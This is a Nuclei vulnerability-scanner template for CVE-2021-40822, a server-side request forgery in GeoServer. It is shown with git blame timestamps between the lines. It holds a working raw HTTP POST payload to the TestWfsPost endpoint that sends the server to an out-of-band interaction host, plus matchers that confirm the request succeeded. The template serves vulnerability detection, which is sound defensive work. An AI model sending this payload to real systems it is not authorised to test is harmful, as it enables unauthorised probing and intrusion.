nuclei-templates/http/cves/2021/CVE-2021-40822.yaml

50 lines
1.3 KiB
YAML
Raw Normal View History

2022-05-18 13:04:39 +00:00
id: CVE-2021-40822
info:
name: Geoserver - Server-Side Request Forgery
2023-07-11 06:44:55 +00:00
author: For3stCo1d,aringo-bf
2022-05-18 13:04:39 +00:00
severity: high
description: GeoServer through 2.18.5 and 2.19.x through 2.19.2 allows server-side request forgery via the option for setting a proxy host.
2022-05-18 13:04:39 +00:00
reference:
- https://gccybermonks.com/posts/cve-2021-40822/
- https://github.com/geoserver/geoserver/compare/2.19.2...2.19.3
- https://github.com/geoserver/geoserver/releases
- https://nvd.nist.gov/vuln/detail/CVE-2021-40822
2022-05-18 13:04:39 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-40822
cwe-id: CWE-918
cpe: cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:*
epss-score: 0.65495
2022-05-18 13:04:39 +00:00
metadata:
max-request: 1
2022-05-18 13:04:39 +00:00
fofa-query: app="GeoServer"
2023-06-04 08:13:42 +00:00
verified: true
2022-07-02 11:44:20 +00:00
tags: cve,cve2021,ssrf,geoserver
2022-05-18 13:04:39 +00:00
http:
2022-05-18 13:04:39 +00:00
- raw:
- |
POST /geoserver/TestWfsPost HTTP/1.1
2023-07-11 06:44:55 +00:00
Host: oast.pro
2022-05-18 13:04:39 +00:00
Content-Type: application/x-www-form-urlencoded
2023-07-11 06:44:55 +00:00
form_hf_0=&url=http://oast.pro/geoserver/../&body=&username=&password=
2022-05-18 13:04:39 +00:00
matchers-condition: and
matchers:
- type: word
2023-07-11 06:44:55 +00:00
part: body
2022-05-18 13:04:39 +00:00
words:
2023-07-11 06:44:55 +00:00
- "Interactsh Server"
2022-05-18 17:00:54 +00:00
- type: word
2023-07-11 06:44:55 +00:00
part: header
2022-05-18 17:00:54 +00:00
words:
2023-07-11 06:44:55 +00:00
- "text/html"
2022-05-18 13:04:39 +00:00
- type: status
status:
- 200